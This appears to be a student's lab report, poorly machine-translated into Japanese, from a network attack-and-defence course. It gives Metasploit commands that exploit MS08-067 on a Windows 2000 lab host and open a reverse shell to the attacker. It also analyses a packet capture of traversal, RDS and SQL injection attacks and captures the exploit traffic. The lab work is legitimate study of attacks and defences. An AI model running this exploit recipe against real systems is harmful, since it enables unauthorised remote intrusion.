20199316 2019-2020-2「ネットワーク攻撃と防御の実践」第7週の割り当て
1.練習内容
今週の学習内容を要約し、実用的な内容を紹介し、コピーして貼り付けないでください
2.実践プロセス
| ホスト | IPアドレス |
|---|---|
| A_kali | 192.168.200.2 |
| B_B_win2kサーバー | 192.168.200.124 |
練習する
1:Kaliでmetasploitを開いて入力msfconsoleし、Enterキーを押して彼のコンソールインターフェイスに入り、ms08_067の脆弱性を最初に検索します。
search ms08_067 //search+漏洞名字
use exploit/windows/smb/ms08_067_netapi
2:攻撃ロードモジュールを選択し、入力してshow payloads、使用する攻撃ロードモジュールを見つけます。Kaliには約100のオプションがあります。3tcpを反転します。この手順では、最初にペイロードを表示し、リストが表示された後に入力する必要がありますset PAYLOAD generic/shell_reverse_tcp 。
3:次に、コマンドを使用して攻撃ターゲットを設定し、コマンドset RHOST 192.168.200.124を使用して攻撃アドレスを設定しますset LHOST 192.168.200.2
4:ターゲットオペレーティングシステムのプラットフォームタイプを設定します。このオプションは0で、0は自動マッチングを意味します
set TARGET 0
5:入力しexploitた攻撃の開始を。攻撃結果は以下の通り
6:攻撃が成功した後、ターゲットマシンのcmdページが入力されたことがわかります。これは、ターゲットマシンに入ったことを意味します。ipconfigを入力して、ターゲットマシンのIPをチェックし、攻撃が成功したかどうかを確認できます。
練習2
1:最初に、wiresharkでその.logファイルを開きます。多くのhttpメッセージが見つかりました。最初にwiresharkに付属の統計ツールを使用して、をクリックします统计->http->请求。次の画像が表示されます。この統計グラフからわかるように、Webページにアクセスすると、多くのファイルがWebサーバーからローカルにダウンロードされることがわかっています。今度はボックスのその部分が攻撃コードになるはずです。
2:次に、資格をip.addr == 172.16.1.106およびhttpとして設定します。それからそれは断り始めました。以下に示すように、117番の行でいくつかの奇妙なパスが見つかりました。
このboot.iniは、NTシステムの起動ファイルです。以前の..%c0af ..情報を確認した後、これが "/"のUnicodeエンコーディングであることを知りました。
3:さらに下を見ると、攻撃者がサーバーからmsadcs.dllファイルを取得しようとしたことがわかります。
4:攻撃者はこのdllを使用してRDSの脆弱性を悪用し、データクエリステートメントを入力してSQLインジェクション攻撃を実行しました。ADM!ROX ..とそのmdbによると。
5:その後、攻撃者はシステムに正常に侵入しました。プルダウンして、攻撃者がFTP接続を確立したことを確認します。ユーザー名とパスワードを入力し、いくつかのファイルをダウンロードしました。
6:その後、攻撃者はポート6969に接続し、アクセス権を取得します
7:番号1444以降、攻撃マシンが複数のSQLインジェクション攻撃を開始しました。データ部分が同じではないことがわかりました。画像にpdumo.exeが表示されます。
8:次に、2339番のHTTPストリームを追跡します。追加によれば、アクセス許可を昇格させる必要があることがわかります
9:これらの攻撃を防ぐ方法
- 1つ目はパッチ適用です。この脆弱性は公式パッチの後で公開され、時間内にパッチを適用しても害はありません。
- 安全チェックリストプラグインを使用してネットワークを強化する
- 既存の脆弱性を特定する脆弱性スキャンソフトウェア
- Webサイトのルートディレクトリとシステムディレクトリは物理的に分離されています。
練習3
1:攻撃の手順はプラクティス1と同じです。攻撃の脆弱性は依然としてms08_067の脆弱性であり、ここでは繰り返されません。攻撃者がエクスプロイトに入ってからEnterキーを押す前に、wiresharkはネットワークカードを通過するパケットをリアルタイムでリッスンするだけです。ターゲットマシンにはWiresharkがないため、監視にはKaliでWiresharkを使用することにしました。効果は同じです。
下の図からわかるように、攻撃者のIPアドレス192.168.200.2、ポート34869、ターゲットマシンのIPアドレス192.168.200.124、ポート445およびその他の情報
2:攻撃はARPから始まり、192.168.200.2のポート39614から192.168.200.124のポート445であることがわかります。 MSRP-06 over SMBチャネルを介してサーバーサービスプログラムのNetPathCanonicalize関数が呼び出されると、MS08-067の脆弱性がトリガーされました。そのため、この脆弱性
3 によって悪用されたほど多くのSMBデータパケットから推測できます。次に、攻撃マシンでipconfigコマンドを入力すると、次の結果が表示されます。
3.学習と解決策で遭遇する問題
- 質問1:最初にエクスプロイト/ windows / smb / ms08_067_netapiの使用をスキップしましたが、最終的にはエクスプロイトを使用できないか、理解するには若すぎました。。。。
- 問題1の解決策:検索後にエクスプロイト/ windows / smb / ms08_067_netapiを使用します。
4.実践のまとめ
実験2は難しすぎます。。。ログファイルに直面して、開始する方法はありません、兄貴の分析を読んだ後、それは段階的に分析されます。理論的な根拠だけでは足りないと思いますが、それができてもわからないことがたくさんあります。時間に限りがあり、仕事は限りない==。